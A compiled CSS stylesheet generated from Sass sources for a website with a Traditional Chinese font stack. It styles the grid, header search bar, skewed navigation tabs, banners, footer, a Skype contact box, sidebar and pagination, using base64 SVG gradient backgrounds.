﻿@charset "UTF-8";
/* line 1, ../sass/_default.scss */
html,
body {
  width: 100%;
  min-height: 100%;
  height: auto;
  padding: 0px;
  margin: 0px;
  text-align: left;
  overflow: visible;
  font-size: 13px;
  color: #0f0f0f;
  background-color: #EAE6E3;
  font-family: "微軟正黑體", "Arial","Verdana",  "Microsoft JhengHei", "Geneva", "sans-serif";
}

/* line 16, ../sass/_default.scss */
body.pc {
  width: 1920px;
}

/* line 20, ../sass/_default.scss */
.pace {
  -webkit-pointer-events: none;
  pointer-events: none;
  -webkit-user-select: none;
  -moz-user-select: none;
  user-select: none;
}
/* line 27, ../sass/_default.scss */
.pace:after {
  position: fixed;
  width: 100%;
  height: 100%;
  background-color: rgba(7, 90, 169, 0.8);
  z-index: 99999;
  display: block;
}

/* line 38, ../sass/_default.scss */
.pace-inactive {
  display: none;
}

/* line 42, ../sass/_default.scss */
.pace .pace-progress {
  background: #075aa9;
  position: fixed;
  z-index: 200000;
  top: 0;
  right: 100%;
  width: 100%;
  height: 3px;
}

/*共用屬性*/
/* line 56, ../sass/_default.scss */
*,
*:before,
*:after {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}

/* line 64, ../sass/_default.scss */
a {
  text-decoration: none;
  color: inherit;
}

/* line 69, ../sass/_default.scss */
a:hover {
  color: inherit;
}

/* line 73, ../sass/_default.scss */
a img {
  border: none;
}

/* line 76, ../sass/_default.scss */
img {
  max-width: 100%;
  max-height: 100%;
  width: auto;
  height: auto;
}

/*泛用表格*/
/* line 86, ../sass/_default.scss */
.t {
  display: table;
}

/* line 90, ../sass/_default.scss */
.t ul {
  display: table-row;
}

/* line 94, ../sass/_default.scss */
.t li {
  padding: 0px;
  margin: 0px;
  display: table-cell;
  list-style: none;
  vertical-align: middle;
}

/* line 103, ../sass/_default.scss */
dl dt,
dl dd {
  float: left;
}

/*定義區塊*/
/* line 113, ../sass/_default.scss */
.container {
  margin: auto;
  position: relative;
  z-index: 100;
  width: 1050px;
}

/* line 121, ../sass/_default.scss */
.content {
  background-color: #ffffff;
  position: relative;
}

/* line 125, ../sass/_default.scss */
.content2 {
  background-image: linear-gradient(to bottom, #d3d3d4 0%, #ffffff 50px);
  padding: 15px;
  margin-top: 10px;
  width: 100%;
  -moz-border-radius: 5px;
  -webkit-border-radius: 5px;
  border-radius: 5px;
}

/* line 135, ../sass/_default.scss */
.col-1,
.col-2,
.col-3,
.col-4,
.col-5,
.col-6,
.col-7,
.col-8,
.col-9,
.col-10,
.col-11,
.col-12 {
  position: relative;
  min-height: 1px;
  float: left;
}

/* line 152, ../sass/_default.scss */
.col-12 {
  width: 100%;
}

/* line 156, ../sass/_default.scss */
.col-11 {
  width: 91.66666667%;
}

/* line 160, ../sass/_default.scss */
.col-10 {
  width: 83.33333333%;
}

/* line 164, ../sass/_default.scss */
.col-9 {
  width: 75%;
}

/* line 168, ../sass/_default.scss */
.col-8 {
  width: 66.66666667%;
}

/* line 172, ../sass/_default.scss */
.col-7 {
  width: 58.33333333%;
}

/* line 176, ../sass/_default.scss */
.col-6 {
  width: 50%;
}

/* line 180, ../sass/_default.scss */
.col-5 {
  width: 41.66666667%;
}

/* line 184, ../sass/_default.scss */
.col-4 {
  width: 33.33333333%;
}

/* line 188, ../sass/_default.scss */
.col-3 {
  width: 25%;
}

/* line 192, ../sass/_default.scss */
.col-2 {
  width: 16.66666667%;
}

/* line 196, ../sass/_default.scss */
.col-1 {
  width: 8.33333333%;
}

/* line 200, ../sass/_default.scss */
span.caret {
  display: inline-block;
  width: 0;
  height: 0;
  vertical-align: middle;
  border-top: 5px solid;
  border-right: 5px solid transparent;
  border-left: 5px solid transparent;
}

/* line 211, ../sass/_default.scss */
span.plus {
  display: inline-block;
  vertical-align: middle;
  width: 13px;
  height: 13px;
  border: 1px solid #b9b9b9;
  -moz-border-radius: 2px;
  -webkit-border-radius: 2px;
  border-radius: 2px;
  margin: 0;
  padding: 0;
  margin-right: 3px;
  position: relative;
}
/* line 223, ../sass/_default.scss */
span.plus:after {
  content: "";
  width: 70%;
  height: 1px;
  background-color: #000;
  display: block;
  margin: 0 auto;
  position: absolute;
  top: 0;
  bottom: 0;
  left: 0;
  right: 0;
  margin: auto;
}
/* line 237, ../sass/_default.scss */
span.plus:before {
  content: "";
  height: 70%;
  width: 1px;
  background-color: #000;
  display: block;
  margin: 0 auto;
  position: absolute;
  left: 0;
  right: 0;
  top: 0;
  bottom: 0;
  margin: auto;
}

/* line 253, ../sass/_default.scss */
.pic {
  position: relative;
  font-size: 0;
}
/* line 256, ../sass/_default.scss */
.pic > span {
  width: 100%;
  height: 100%;
  position: absolute;
  text-align: center;
}
/* line 261, ../sass/_default.scss */
.pic > span:before {
  content: ' ';
  display: inline-block;
  height: 100%;
  width: 0;
  vertical-align: middle;
}
/* line 268, ../sass/_default.scss */
.pic > span > img, .pic > span > iframe {
  max-width: 100%;
  max-height: 100%;
  width: auto;
  height: auto;
  display: inline-block;
  vertical-align: middle;
}
/* line 276, ../sass/_default.scss */
.pic > span > iframe {
  width: 100%;
  height: 100%;
}

/* line 286, ../sass/_default.scss */
.cf:after,
.row:after,
dl:after {
  display: block;
  height: 0;
  clear: both;
  content: "";
  visibility: hidden;
}

/* line 11, ../sass/_layout.scss */
header {
  font-size: 0;
}
/* line 13, ../sass/_layout.scss */
header .container {
  padding-top: 20px;
  padding-bottom: 10px;
  padding-left: 1%;
  overflow: hidden;
}
/* line 19, ../sass/_layout.scss */
header #logo,
header #search_bar,
header #right_bar {
  display: inline-block;
}
/* line 24, ../sass/_layout.scss */
header #logo {
  width: 32%;
}
/* line 26, ../sass/_layout.scss */
header #logo a {
  display: inline-block;
  position: relative;
  top: 35px;
}
/* line 34, ../sass/_layout.scss */
header #results .gsc-results {
  /* Sets font for titles, snippets, and URLs. */
  font-family: arial, helvetica, sans-serif;
}
/* line 39, ../sass/_layout.scss */
header #results .gsc-result {
  position: relative;
  border: 1px solid #eee;
  border-left: 10px solid #eee;
  padding: 8px 8px 8px 20px;
  border-radius: 8px;
  -webkit-border-radius: 8px;
  -moz-border-radius: 8px;
}
/* line 65, ../sass/_layout.scss */
header #search_bar {
  font-size: 11px;
  width: 38%;
  padding-left: 2%;
}
/* line 69, ../sass/_layout.scss */
header #search_bar .search_input {
  width: 80%;
  -moz-border-radius: 5px;
  -webkit-border-radius: 5px;
  border-radius: 5px;
  background: #fff;
  border: 1px solid #8c8c8c;
  position: relative;
}
/* line 75, ../sass/_layout.scss */
header #search_bar .search_input input {
  width: 100%;
  border: none;
  background: none;
  height: 30px;
  line-height: 30px;
  padding-left: 10px;
}
/* line 84, ../sass/_layout.scss */
header #search_bar .search_input label .fa {
  padding: 0 5px;
  position: absolute;
  right: 0;
  top: 0;
  margin: auto;
  display: inline-block;
  font-size: 20px;
  line-height: 30px;
  font-weight: 100;
  border-left: 1px solid #8c8c8c;
  color: #8c8c8c;
  cursor: pointer;
}
/* line 101, ../sass/_layout.scss */
header #right_bar {
  text-align: right;
  width: 30%;
  vertical-align: bottom;
}
/* line 105, ../sass/_layout.scss */
header #right_bar .server-row {
  margin-bottom: 20px;
}
/* line 107, ../sass/_layout.scss */
header #right_bar .server-row li {
  display: inline-block;
  font-size: 13px;
  vertical-align: middle;
  margin: 0 5px;
}
/* line 114, ../sass/_layout.scss */
header #right_bar .lang {
  padding-right: 10px;
}
/* line 116, ../sass/_layout.scss */
header #right_bar .lang li {
  font-size: 12px;
  display: inline-block;
  vertical-align: middle;
  color: #8C8C8C;
  line-height: 15px;
}
/* line 122, ../sass/_layout.scss */
header #right_bar .lang li + li:before {
  content: '∣';
  display: inline-block;
  vertical-align: middle;
  margin: 0 5px;
  line-height: 15px;
}
/* line 130, ../sass/_layout.scss */
header #right_bar .lang li a:hover {
  text-decoration: underline;
}

/* line 138, ../sass/_layout.scss */
.content {
  -moz-border-radius: 10px;
  -webkit-border-radius: 10px;
  border-radius: 10px;
  -moz-box-shadow: 6px 3px #d3cbc5;
  -webkit-box-shadow: 6px 3px #d3cbc5;
  box-shadow: 6px 3px #d3cbc5;
  position: relative;
  padding: 12px;
}
/* line 144, ../sass/_layout.scss */
.content:after {
  content: ' ';
  width: 101%;
  background-color: #D3CBC5;
  position: absolute;
  left: -.5%;
  top: 5px;
  margin: auto;
  z-index: -1;
  -moz-border-radius: 10px;
  -webkit-border-radius: 10px;
  border-radius: 10px;
}

/* line 157, ../sass/_layout.scss */
nav {
  width: 100%;
  overflow: hidden;
  border: 1px solid #8c8c8c;
  -moz-border-radius: 5px;
  -webkit-border-radius: 5px;
  border-radius: 5px;
}
/* line 162, ../sass/_layout.scss */
nav > ul {
  width: 100%;
  font-size: 0;
  height: 35px;
  line-height: 35px;
  white-space: nowrap;
  margin-left: -2%;
}
/* line 169, ../sass/_layout.scss */
nav > ul > li {
  border-right: 1px solid #9f9f9f;
  border-left: 1px solid #fff;
  border-bottom: 1px solid #fff;
  font-size: 13px;
  display: inline-block;
  vertical-align: middle;
  width: 14.2857142857%;
  text-align: center;
  -moz-transform: skewX(30deg);
  -ms-transform: skewX(30deg);
  -webkit-transform: skewX(30deg);
  transform: skewX(30deg);
  background-image: url('data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4gPHN2ZyB2ZXJzaW9uPSIxLjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PGRlZnM+PGxpbmVhckdyYWRpZW50IGlkPSJncmFkIiBncmFkaWVudFVuaXRzPSJvYmplY3RCb3VuZGluZ0JveCIgeDE9IjAuNSIgeTE9IjAuMCIgeDI9IjAuNSIgeTI9IjEuMCI+PHN0b3Agb2Zmc2V0PSI2MyUiIHN0b3AtY29sb3I9IiNmN2Y3ZjciLz48c3RvcCBvZmZzZXQ9IjEwMCUiIHN0b3AtY29sb3I9IiNkM2NiYzUiLz48L2xpbmVhckdyYWRpZW50PjwvZGVmcz48cmVjdCB4PSIwIiB5PSIwIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIxMDAlIiBmaWxsPSJ1cmwoI2dyYWQpIiAvPjwvc3ZnPiA=');
  background-size: 100%;
  background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(63%, #f7f7f7), color-stop(100%, #d3cbc5));
  background-image: -moz-linear-gradient(top, #f7f7f7 63%, #d3cbc5 100%);
  background-image: -webkit-linear-gradient(top, #f7f7f7 63%, #d3cbc5 100%);
  background-image: linear-gradient(to bottom, #f7f7f7 63%, #d3cbc5 100%);
  white-space: nowrap;
}
/* line 184, ../sass/_layout.scss */
nav > ul > li:first-child, nav > ul > li:last-child {
  width: 16%;
}
/* line 188, ../sass/_layout.scss */
nav > ul > li a {
  -moz-transform: skewX(-30deg);
  -ms-transform: skewX(-30deg);
  -webkit-transform: skewX(-30deg);
  transform: skewX(-30deg);
  display: block;
}
/* line 192, ../sass/_layout.scss */
nav > ul > li:hover, nav > ul > li.active {
  color: #fff;
  background-image: url('data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4gPHN2ZyB2ZXJzaW9uPSIxLjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PGRlZnM+PGxpbmVhckdyYWRpZW50IGlkPSJncmFkIiBncmFkaWVudFVuaXRzPSJvYmplY3RCb3VuZGluZ0JveCIgeDE9IjAuNSIgeTE9IjAuMCIgeDI9IjAuNSIgeTI9IjEuMCI+PHN0b3Agb2Zmc2V0PSI2MyUiIHN0b3AtY29sb3I9IiMwNzVhYTkiLz48c3RvcCBvZmZzZXQ9IjEwMCUiIHN0b3AtY29sb3I9IiM3NWI2ZTQiLz48L2xpbmVhckdyYWRpZW50PjwvZGVmcz48cmVjdCB4PSIwIiB5PSIwIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIxMDAlIiBmaWxsPSJ1cmwoI2dyYWQpIiAvPjwvc3ZnPiA=');
  background-size: 100%;
  background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(63%, #075aa9), color-stop(100%, #75b6e4));
  background-image: -moz-linear-gradient(top, #075aa9 63%, #75b6e4 100%);
  background-image: -webkit-linear-gradient(top, #075aa9 63%, #75b6e4 100%);
  background-image: linear-gradient(to bottom, #075aa9 63%, #75b6e4 100%);
}
/* line 197, ../sass/_layout.scss */
nav > ul > li > ul {
  display: none;
}

/* line 205, ../sass/_layout.scss */
#banner {
  margin-top: 6px;
  margin-bottom: 0;
  outline: none;
  overflow: hidden;
}
/* line 210, ../sass/_layout.scss */
#banner .item {
  width: 100%;
}
/* line 212, ../sass/_layout.scss */
#banner .item .bg_img {
  display: none;
  width: 100%;
  height: 0;
  padding-bottom: 32%;
  background-position: 50% 50%;
  -webkit-background-size: contain;
  -o-background-size: contain;
  background-size: contain;
  background-repeat: no-repeat;
}

/* line 221, ../sass/_layout.scss */
#banner2 {
  display: none;
  margin-top: 10px;
  margin-bottom: 0;
  outline: none;
  overflow: hidden;
}
/* line 227, ../sass/_layout.scss */
#banner2 .item {
  width: 100%;
}
/* line 229, ../sass/_layout.scss */
#banner2 .item .bg_img {
  display: none;
  width: 100%;
  height: 0;
  padding-bottom: 32%;
  background-position: 50% 50%;
  -webkit-background-size: contain;
  -o-background-size: contain;
  background-size: contain;
  background-repeat: no-repeat;
}

/* line 240, ../sass/_layout.scss */
footer {
  margin-top: 100px;
  color: #666666;
}
/* line 243, ../sass/_layout.scss */
footer .footer_nav {
  font-size: 0;
  text-align: center;
  margin-bottom: 10px;
}
/* line 247, ../sass/_layout.scss */
footer .footer_nav li {
  display: inline-block;
  vertical-align: middle;
  font-size: 13px;
  line-height: 15px;
  padding: 0 10px;
}
/* line 253, ../sass/_layout.scss */
footer .footer_nav li img {
  display: inline-block;
}
/* line 256, ../sass/_layout.scss */
footer .footer_nav li + li {
  border-left: 1px solid;
}
/* line 259, ../sass/_layout.scss */
footer .footer_nav li .facebook {
  padding: 0px 10px;
  background-color: #18438B;
  color: #fff;
  text-align: center;
  margin: 0 auto;
  cursor: pointer;
  font-size: 13px;
}
/* line 270, ../sass/_layout.scss */
footer .info-row {
  text-align: center;
  font-size: 0;
}
/* line 273, ../sass/_layout.scss */
footer .info-row .info,
footer .info-row .copyright {
  display: inline-block;
  vertical-align: top;
  font-size: 13px;
  line-height: 15px;
}
/* line 279, ../sass/_layout.scss */
footer .info-row .info span,
footer .info-row .copyright span {
  display: inline-block;
  padding: 0 10px;
  box-sizing: border-box;
}
/* line 285, ../sass/_layout.scss */
footer .info-row .info {
  margin-right: 3%;
}

/* line 291, ../sass/_layout.scss */
h2 {
  font-size: 0px;
  white-space: nowrap;
  overflow: hidden;
}
/* line 295, ../sass/_layout.scss */
h2 > p {
  font-size: 15px;
  display: inline-block;
  vertical-align: middle;
  margin: 0 -4px;
  line-height: 1.6;
}
/* line 302, ../sass/_layout.scss */
h2:before {
  content: '';
  display: inline-block;
  vertical-align: middle;
  height: 1px;
  width: 15px;
  background-color: #000;
}
/* line 310, ../sass/_layout.scss */
h2:after {
  content: '';
  display: inline-block;
  vertical-align: middle;
  height: 1px;
  width: 100%;
  background-color: #000;
}

/* line 319, ../sass/_layout.scss */
h3 {
  color: #1286B3;
  font-size: 15px;
  margin: 10px 0;
}

/* line 326, ../sass/_layout.scss */
.skype-row {
  position: fixed;
  right: 10px;
  top: 80px;
  -moz-border-radius: 5px;
  -webkit-border-radius: 5px;
  border-radius: 5px;
  border: 1px solid #888888;
}
/* line 334, ../sass/_layout.scss */
.skype-row .del {
  font-size: 10px;
  background-color: #000;
  color: #fff;
  text-align: center;
  padding: 3px 5px;
  display: inline-block;
  float: right;
  position: relative;
  top: -18px;
  right: 5px;
  cursor: pointer;
}
/* line 346, ../sass/_layout.scss */
.skype-row .del .fa {
  font-size: 10px;
}
/* line 350, ../sass/_layout.scss */
.skype-row .skype_bg {
  background-image: url('data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4gPHN2ZyB2ZXJzaW9uPSIxLjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PGRlZnM+PGxpbmVhckdyYWRpZW50IGlkPSJncmFkIiBncmFkaWVudFVuaXRzPSJvYmplY3RCb3VuZGluZ0JveCIgeDE9IjAuNSIgeTE9IjAuMCIgeDI9IjAuNSIgeTI9IjEuMCI+PHN0b3Agb2Zmc2V0PSI1MCUiIHN0b3AtY29sb3I9IiMwNzVhYTkiLz48c3RvcCBvZmZzZXQ9IjEwMCUiIHN0b3AtY29sb3I9IiM3NWI2ZTQiLz48L2xpbmVhckdyYWRpZW50PjwvZGVmcz48cmVjdCB4PSIwIiB5PSIwIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIxMDAlIiBmaWxsPSJ1cmwoI2dyYWQpIiAvPjwvc3ZnPiA=');
  background-size: 100%;
  background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(50%, #075aa9), color-stop(100%, #75b6e4));
  background-image: -moz-linear-gradient(top, #075aa9 50%, #75b6e4 100%);
  background-image: -webkit-linear-gradient(top, #075aa9 50%, #75b6e4 100%);
  background-image: linear-gradient(to bottom, #075aa9 50%, #75b6e4 100%);
  padding: 8px;
  width: 200px;
  -moz-border-radius: 5px;
  -webkit-border-radius: 5px;
  border-radius: 5px;
  border-bottom: 1px solid #ffffff;
  border-left: 1px solid #ffffff;
}
/* line 357, ../sass/_layout.scss */
.skype-row .skype_bg .icon {
  text-align: right;
  width: 100%;
  margin-bottom: 10px;
}
/* line 361, ../sass/_layout.scss */
.skype-row .skype_bg .icon img {
  display: inline-block;
}
/* line 365, ../sass/_layout.scss */
.skype-row .skype_bg .text {
  text-align: center;
  line-height: 18px;
}
/* line 368, ../sass/_layout.scss */
.skype-row .skype_bg .text .text1 {
  font-size: 14px;
  color: #fff;
}
/* line 372, ../sass/_layout.scss */
.skype-row .skype_bg .text .text2 {
  font-size: 10px;
  color: #fff;
}
/* line 376, ../sass/_layout.scss */
.skype-row .skype_bg .text .text3 {
  font-size: 10px;
  color: #FFFF00;
}
/* line 381, ../sass/_layout.scss */
.skype-row .skype_bg .account-row {
  background-color: #fff;
  text-align: center;
  padding: 8px;
  -moz-border-radius: 5px;
  -webkit-border-radius: 5px;
  border-radius: 5px;
}
/* line 386, ../sass/_layout.scss */
.skype-row .skype_bg .account-row a {
  display: inline-block;
  width: 100%;
  line-height: 1.6;
  color: #00A0C6;
}
/* line 391, ../sass/_layout.scss */
.skype-row .skype_bg .account-row a:hover {
  color: #000;
}
/* line 393, ../sass/_layout.scss */
.skype-row .skype_bg .account-row span {
  font-size: 14px;
  margin: 5px 0;
  display: block;
}

/* line 402, ../sass/_layout.scss */
.l_back {
  text-align: right;
  margin-top: 50px;
}
/* line 405, ../sass/_layout.scss */
.l_back a {
  display: inline-block;
  width: 100px;
  height: 35px;
  line-height: 35px;
  text-align: center;
  color: #fff;
  font-size: 15px;
  background-image: url('data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4gPHN2ZyB2ZXJzaW9uPSIxLjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PGRlZnM+PGxpbmVhckdyYWRpZW50IGlkPSJncmFkIiBncmFkaWVudFVuaXRzPSJvYmplY3RCb3VuZGluZ0JveCIgeDE9IjAuNSIgeTE9IjAuMCIgeDI9IjAuNSIgeTI9IjEuMCI+PHN0b3Agb2Zmc2V0PSI3MCUiIHN0b3AtY29sb3I9IiMwNzVhYTkiLz48c3RvcCBvZmZzZXQ9IjEwMCUiIHN0b3AtY29sb3I9IiM3NWI2ZTQiLz48L2xpbmVhckdyYWRpZW50PjwvZGVmcz48cmVjdCB4PSIwIiB5PSIwIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIxMDAlIiBmaWxsPSJ1cmwoI2dyYWQpIiAvPjwvc3ZnPiA=');
  background-size: 100%;
  background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(70%, #075aa9), color-stop(100%, #75b6e4));
  background-image: -moz-linear-gradient(top, #075aa9 70%, #75b6e4 100%);
  background-image: -webkit-linear-gradient(top, #075aa9 70%, #75b6e4 100%);
  background-image: linear-gradient(to bottom, #075aa9 70%, #75b6e4 100%);
  -moz-border-radius: 5px;
  -webkit-border-radius: 5px;
  border-radius: 5px;
}

/* line 421, ../sass/_layout.scss */
.sidebar_layout aside,
.sidebar_layout article {
  float: left;
}
/* line 425, ../sass/_layout.scss */
.sidebar_layout aside {
  width: 165px;
  padding-top: 20px;
}
/* line 428, ../sass/_layout.scss */
.sidebar_layout aside ul {
  width: 100%;
  border-collapse: collapse;
}
/* line 431, ../sass/_layout.scss */
.sidebar_layout aside ul li {
  width: 100%;
  border: 1px solid rgba(51, 51, 51, 0.6);
  font-size: 13px;
  position: relative;
  background-image: url('data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4gPHN2ZyB2ZXJzaW9uPSIxLjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PGRlZnM+PGxpbmVhckdyYWRpZW50IGlkPSJncmFkIiBncmFkaWVudFVuaXRzPSJvYmplY3RCb3VuZGluZ0JveCIgeDE9IjAuNSIgeTE9IjAuMCIgeDI9IjAuNSIgeTI9IjEuMCI+PHN0b3Agb2Zmc2V0PSI2MyUiIHN0b3AtY29sb3I9IiNmN2Y3ZjciLz48c3RvcCBvZmZzZXQ9IjEwMCUiIHN0b3AtY29sb3I9IiNkM2QzZDQiLz48L2xpbmVhckdyYWRpZW50PjwvZGVmcz48cmVjdCB4PSIwIiB5PSIwIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIxMDAlIiBmaWxsPSJ1cmwoI2dyYWQpIiAvPjwvc3ZnPiA=');
  background-size: 100%;
  background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(63%, #f7f7f7), color-stop(100%, #d3d3d4));
  background-image: -moz-linear-gradient(top, #f7f7f7 63%, #d3d3d4 100%);
  background-image: -webkit-linear-gradient(top, #f7f7f7 63%, #d3d3d4 100%);
  background-image: linear-gradient(to bottom, #f7f7f7 63%, #d3d3d4 100%);
}
/* line 437, ../sass/_layout.scss */
.sidebar_layout aside ul li + li {
  border-top: none;
}
/* line 440, ../sass/_layout.scss */
.sidebar_layout aside ul li a {
  display: block;
  width: 100%;
  padding: 15px 0;
  padding-left: 13%;
  border: 1px solid #fff;
}
/* line 448, ../sass/_layout.scss */
.sidebar_layout aside ul li:hover, .sidebar_layout aside ul li.active {
  background-image: url('data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4gPHN2ZyB2ZXJzaW9uPSIxLjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PGRlZnM+PGxpbmVhckdyYWRpZW50IGlkPSJncmFkIiBncmFkaWVudFVuaXRzPSJvYmplY3RCb3VuZGluZ0JveCIgeDE9IjAuNSIgeTE9IjAuMCIgeDI9IjAuNSIgeTI9IjEuMCI+PHN0b3Agb2Zmc2V0PSI2MyUiIHN0b3AtY29sb3I9IiMwNzVhYTkiLz48c3RvcCBvZmZzZXQ9IjEwMCUiIHN0b3AtY29sb3I9IiM3NWI2ZTQiLz48L2xpbmVhckdyYWRpZW50PjwvZGVmcz48cmVjdCB4PSIwIiB5PSIwIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIxMDAlIiBmaWxsPSJ1cmwoI2dyYWQpIiAvPjwvc3ZnPiA=');
  background-size: 100%;
  background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(63%, #075aa9), color-stop(100%, #75b6e4));
  background-image: -moz-linear-gradient(top, #075aa9 63%, #75b6e4 100%);
  background-image: -webkit-linear-gradient(top, #075aa9 63%, #75b6e4 100%);
  background-image: linear-gradient(to bottom, #075aa9 63%, #75b6e4 100%);
  color: #fff;
}
/* line 452, ../sass/_layout.scss */
.sidebar_layout aside ul li:hover:before, .sidebar_layout aside ul li.active:before {
  content: "\f0da";
  font-family: 'FontAwesome';
  font-size: 13px;
  color: #1286b3;
  width: 13px;
  height: 13px;
  line-height: 15px;
  text-align: center;
  display: inline-block;
  -moz-border-radius: 50%;
  -webkit-border-radius: 50%;
  border-radius: 50%;
  background-color: #fff;
  position: absolute;
  top: 0;
  bottom: 0;
  left: 4%;
  margin: auto;
  padding-left: 1px;
}
/* line 475, ../sass/_layout.scss */
.sidebar_layout article {
  width: calc(100% - 165px);
  padding: 0 3%;
}
/* line 478, ../sass/_layout.scss */
.sidebar_layout article .bread {
  font-size: 0;
  margin-bottom: 10px;
}
/* line 481, ../sass/_layout.scss */
.sidebar_layout article .bread a {
  display: inline-block;
  font-size: 13px;
}
/* line 485, ../sass/_layout.scss */
.sidebar_layout article .bread a + a:before {
  content: '>';
  display: inline-block;
  vertical-align: middle;
  margin: 0 2px;
}
/* line 492, ../sass/_layout.scss */
.sidebar_layout article .bread a:last-child {
  color: #ff0000;
}
/* line 494, ../sass/_layout.scss */
.sidebar_layout article .bread a:last-child:before {
  color: #000;
}
/* line 500, ../sass/_layout.scss */
.sidebar_layout article h2 {
  margin-bottom: 20px;
}

/* line 507, ../sass/_layout.scss */
.pages {
  text-align: center;
  font-size: 0;
  margin-top: 100px;
}
/* line 511, ../sass/_layout.scss */
.pages a {
  display: inline-block;
  font-size: 15px;
  margin: 0 3px;
  border: 1px solid #666666;
  color: #666666;
  line-height: 25px;
  padding: 0 5px;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  transition: all 0.3s linear;
}
/* line 520, ../sass/_layout.scss */
.pages a .fa {
  font-weight: bold;
  font-size: 20px;
  display: inline-block;
}
/* line 526, ../sass/_layout.scss */
.pages a.prev .fa {
  margin-right: 5px;
}
/* line 531, ../sass/_layout.scss */
.pages a.next .fa {
  margin-left: 5px;
}
/* line 535, ../sass/_layout.scss */
.pages a:hover, .pages a.active {
  background-color: #666;
  color: #fff;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  transition: all 0.3s linear;
}
/* line 542, ../sass/_layout.scss */
.pages .show {
  font-size: 11px;
  margin-top: 10px;
}

/* line 547, ../sass/_layout.scss */
.l_send {
  font-size: 15px;
  text-align: center;
}
/* line 550, ../sass/_layout.scss */
.l_send a {
  display: inline-block;
  color: #fff;
  width: 90px;
  height: 30px;
  line-height: 30px;
  background-image: url('data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4gPHN2ZyB2ZXJzaW9uPSIxLjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PGRlZnM+PGxpbmVhckdyYWRpZW50IGlkPSJncmFkIiBncmFkaWVudFVuaXRzPSJvYmplY3RCb3VuZGluZ0JveCIgeDE9IjAuNSIgeTE9IjAuMCIgeDI9IjAuNSIgeTI9IjEuMCI+PHN0b3Agb2Zmc2V0PSIwJSIgc3RvcC1jb2xvcj0iI2E4MTkxOSIvPjxzdG9wIG9mZnNldD0iMTAwJSIgc3RvcC1jb2xvcj0iIzc3MWEwZCIvPjwvbGluZWFyR3JhZGllbnQ+PC9kZWZzPjxyZWN0IHg9IjAiIHk9IjAiIHdpZHRoPSIxMDAlIiBoZWlnaHQ9IjEwMCUiIGZpbGw9InVybCgjZ3JhZCkiIC8+PC9zdmc+IA==');
  background-size: 100%;
  background-image: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(0%, #a81919), color-stop(100%, #771a0d));
  background-image: -moz-linear-gradient(top, #a81919, #771a0d);
  background-image: -webkit-linear-gradient(top, #a81919, #771a0d);
  background-image: linear-gradient(to bottom, #a81919, #771a0d);
  -moz-border-radius: 10px;
  -webkit-border-radius: 10px;
  border-radius: 10px;
  text-align: center;
}

/* line 563, ../sass/_layout.scss */
.b_h {
  display: none;
}

/* line 566, ../sass/_layout.scss */
.editor {
  word-break: break-word;
  line-height: 22px;
}
/* line 569, ../sass/_layout.scss */
.editor img {
  max-width: 100%;
  height: auto !important;
}
/* line 573, ../sass/_layout.scss */
.editor i {
  font-style: italic;
}
/* line 576, ../sass/_layout.scss */
.editor a {
  text-decoration: underline;
  color: #075aa9;
}
/* line 580, ../sass/_layout.scss */
.editor em, .editor b, .editor strong {
  font-weight: bold;
}

/* line 586, ../sass/_layout.scss */
.change_type {
  width: 100%;
  text-align: center;
}
/* line 589, ../sass/_layout.scss */
.change_type a {
  color: #075aa9;
  font-size: 15px;
  text-decoration: underline;
}

/* line 596, ../sass/_layout.scss */
.weekly {
  line-height: 2;
  color: red;
  opacity: 0;
  letter-spacing: 1.1px;
}

/* line 603, ../sass/_layout.scss */
.color-red {
  color: red;
}

/* line 606, ../sass/_layout.scss */
.ex2 {
  font-size: 13px;
  color: #f00;
}

/* line 2, ../sass/_index.scss */
.index-row .index_news,
.index-row .index_catalogue {
  float: left;
}
/* line 5, ../sass/_index.scss */
.index-row .index_news h2,
.index-row .index_catalogue h2 {
  margin-bottom: 10px;
}
/* line 7, ../sass/_index.scss */
.index-row .index_news h2:after,
.index-row .index_catalogue h2:after {
  width: 150px;
}
/* line 12, ../sass/_index.scss */
.index-row .index_news {
  width: 30%;
}
/* line 14, ../sass/_index.scss */
.index-row .index_news h2 {
  color: #FF0000;
}
